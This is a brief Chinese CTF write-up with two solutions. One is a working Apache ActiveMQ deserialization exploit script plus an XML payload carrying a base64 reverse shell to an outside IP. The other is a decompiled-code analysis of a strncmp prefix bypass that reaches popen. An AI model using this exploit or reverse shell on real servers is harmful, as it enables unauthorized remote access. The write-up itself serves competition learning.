唉,咱好菜,就出了两个题,ghostscript那个题调了半天没调通
Be-an-ActiveMq-Hacker 搜了一下 用网上的exp打通了
https://blog.csdn.net/weixin_49125123/article/details/135577221
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 import ioimport socketimport sysdef main (ip, port, xml ): classname = "org.springframework.context.support.ClassPathXmlApplicationContext" socket_obj = socket.socket(socket.AF_INET, socket.SOCK_STREAM) socket_obj.connect((ip, port)) with socket_obj: out = socket_obj.makefile('wb' ) out.write(int (32 ).to_bytes(4 , 'big' )) out.write(bytes ([31 ])) out.write(int (1 ).to_bytes(4 , 'big' )) out.write(bool (True ).to_bytes(1 , 'big' )) out.write(int (1 ).to_bytes(4 , 'big' )) out.write(bool (True ).to_bytes(1 , 'big' )) out.write(bool (True ).to_bytes(1 , 'big' )) out.write(len (classname).to_bytes(2 , 'big' )) out.write(classname.encode('utf-8' )) out.write(bool (True ).to_bytes(1 , 'big' )) out.write(len (xml).to_bytes(2 , 'big' )) out.write(xml.encode('utf-8' )) out.flush() out.close() if __name__ == "__main__" : if len (sys.argv) != 4 : print ("Please specify the target and port and poc.xml: python3 poc.py 127.0.0.1 61616 " "http://192.168.0.101:8888/poc.xml" ) exit(-1 ) main(sys.argv[1 ], int (sys.argv[2 ]), sys.argv[3 ])
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 <?xml version="1.0" encoding="UTF-8" ?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>bash</value> <value>-c</value> <value>{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xMzIvMjMzMyAwPiYx}|{base64,-d}|{bash,-i}</value> </list> </constructor-arg> </bean> </beans>
vision 问题出在 not Support 4 这里,在 strncmp这,
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 else { memset (s2, 0 , sizeof (s2)); v11 = strchr (a1, 32 ); if ( v11 ) { strncpy (s2, a1, v11 - a1); } else { n = strlen (a1); strncpy (s2, a1, n); } v13 = strlen (s2); if ( v13 ) { v7 = 0 ; v10 = off_4020[0 ]; while ( strncmp (v10, s2, v13) ) { v10 = off_4020[++v7]; if ( !off_4020[v7] ) { strcpy (a2, "Not Support 4. \n" ); return __readfsqword(0x28 u) ^ v23; } }
这里的逻辑是,判断输入的字符串在不在命令列表里面,strncmp 需要一个大小的参数,来判断cmp多少字节,cmp成功后会先判断是不是一些预设的命令,如果不是就会传到下边popen那执行命令
1 2 3 4 5 6 7 8 9 10 11 12 13 .data:0000000000004020 6B 20 00 00 00 00 00 00 off_4020 dq offset s1 ; DATA XREF: sub_1589+3E5↑o .data:0000000000004020 ; sub_1589+410↑o .data:0000000000004020 ; sub_1589+432↑o .data:0000000000004020 ; "ping" .data:0000000000004028 70 20 00 00 00 00 00 00 dq offset aUname ; "uname" .data:0000000000004030 76 20 00 00 00 00 00 00 dq offset aPwd ; "pwd" .data:0000000000004038 7A 20 00 00 00 00 00 00 dq offset aDate ; "date" .data:0000000000004040 7F 20 00 00 00 00 00 00 dq offset aId ; "id" .data:0000000000004048 82 20 00 00 00 00 00 00 dq offset aWhoami ; "whoami" .data:0000000000004050 89 20 00 00 00 00 00 00 dq offset aPoweroff ; "poweroff" .data:0000000000004058 92 20 00 00 00 00 00 00 dq offset aShowkey ; "showKey" .data:0000000000004060 9A 20 00 00 00 00 00 00 dq offset aOpenthedoor ; "openthedoor" .data:0000000000004068 00 00 00 00 00 00 00 00 align 10h
1 2 3 4 5 6 7 8 9 10 11 12 13 else { stream = popen(a1, "re" ); if ( !stream ) { perror("popen failed" ); exit (1 ); } while ( fgets(s, 256 , stream) ) strcat (a2, s); pclose(stream); } }
命令列表那有一个showkey,如果传一个sh,strncmp cmp两个字节,这个cmp就过了,会传到下边popen那执行命令
exp
